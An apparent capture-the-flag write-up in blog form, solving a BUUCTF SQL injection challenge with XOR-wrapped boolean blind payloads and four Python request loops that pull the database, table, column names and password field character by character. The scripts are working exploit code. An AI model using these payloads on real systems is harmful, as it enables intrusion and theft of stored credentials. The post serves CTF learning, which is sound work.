A simple script for boolean-based blind SQL injection (where the page response differs)

When we find during SQL injection that the target is only blind-injectable, exploiting it by hand is extremely time-consuming,
so we need to write a simple script. Below I present my own script,
using the finalsql challenge from buuctf (极客大挑战) as the example.

Once the payload is built, we hand it straight to the script.
First, get the database name.
payload:

1^(ascii(substr((select(database())),1,1))>1)^1

The 1^(...)^1 shape is an XOR trick: when the condition is true the expression evaluates to 1^1^1 = 1 and the normal id=1 page comes back; when it is false it evaluates to 1^0^1 = 0 and the id=0 page comes back instead. The scripts below use exactly that difference as their oracle: the normal page contains the word 'Click', the id=0 page does not.

Before running it you have to determine the length of database() by hand, trying n = 1, 2, 3, ... until the page looks like the normal id=1 page:

1^(length(database())=4)^1

database script:

# -*- coding: utf-8 -*-
# @Author: Firebasky
import requests as req

url = "http://aa85fe53-92e5-4f8a-aced-2b1f8cf87850.node3.buuoj.cn/search.php?id="

result = ''

for i in range(1, 5):          # database() is 4 characters long (probed by hand above)
    for j in range(32, 128):   # printable ASCII range
        payload = '1^(ascii(substr((select(database())),' + str(i) + ',1))>' + str(j) + ')^1'
        print(payload)
        r = req.get(url + payload)

        # condition true -> normal id=1 page, which contains 'Click';
        # the first j for which ascii(char) > j fails is the character code itself
        if r.text.find('Click') == -1:
            result += chr(j)
            print(j)
            break

print(result)
# database() = geek

Next, get the table name.
payload:

id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema="geek")),1,1))>1)^1

table script:

# -*- coding: utf-8 -*-
# @Author: Firebasky
import requests as req

url = "http://aa85fe53-92e5-4f8a-aced-2b1f8cf87850.node3.buuoj.cn/search.php?id="

result = ''

for i in range(1, 8):          # group_concat(table_name) is 7 characters long
    for j in range(32, 128):   # printable ASCII range
        payload = '1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema="geek")),' + str(i) + ',1))>' + str(j) + ')^1'
        print(payload)
        r = req.get(url + payload)

        # 'Click' missing -> condition false -> j equals the character code
        if r.text.find('Click') == -1:
            result += chr(j)
            print(j)
            break

print(result)
# table_name = F1naI1y

Then get the column names.
payload:

id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="F1naI1y")),1,1))>1)^1

column script:

# -*- coding: utf-8 -*-
# @Author: Firebasky
import requests as req

url = "http://aa85fe53-92e5-4f8a-aced-2b1f8cf87850.node3.buuoj.cn/search.php?id="

result = ''

for i in range(1, 21):         # group_concat(column_name) is 20 characters long
    for j in range(32, 128):   # printable ASCII range
        payload = '1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="F1naI1y")),' + str(i) + ',1))>' + str(j) + ')^1'
        print(payload)
        r = req.get(url + payload)

        # 'Click' missing -> condition false -> j equals the character code
        if r.text.find('Click') == -1:
            result += chr(j)
            print(j)
            break

print(result)
# columns: id, username, password

Finally, get the flag.
payload:

id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),1,1))>1)^1

flag script:

# -*- coding: utf-8 -*-
# @Author: Firebasky
import requests as req

url = "http://aa85fe53-92e5-4f8a-aced-2b1f8cf87850.node3.buuoj.cn/search.php?id="

result = ''

# Upper bound guessed generously. Past the end of the string substr() returns ''
# and ascii('') is 0, so every remaining position appends a space (0 > 32 is false).
for i in range(1, 400):
    for j in range(32, 128):   # printable ASCII range
        payload = '1^(ascii(substr((select(group_concat(password))from(F1naI1y)),' + str(i) + ',1))>' + str(j) + ')^1'
        print(payload)
        r = req.get(url + payload)

        # 'Click' missing -> condition false -> j equals the character code
        if r.text.find('Click') == -1:
            result += chr(j)
            print(j)
            break

print(result.rstrip())   # drop the trailing spaces produced past the end of the string
#flag{}

Summary:
All the scripts above share one structure: keep the condition true, and record the character at the first value for which it stops holding.
Their advantage is that they are very simple; their drawback is that they are very slow, since each character costs up to 96 requests (one per value of j from 32 to 127).
In the next post I will cover a binary-search version of the script.

posted @ 2020-07-26 13:30  Firebasky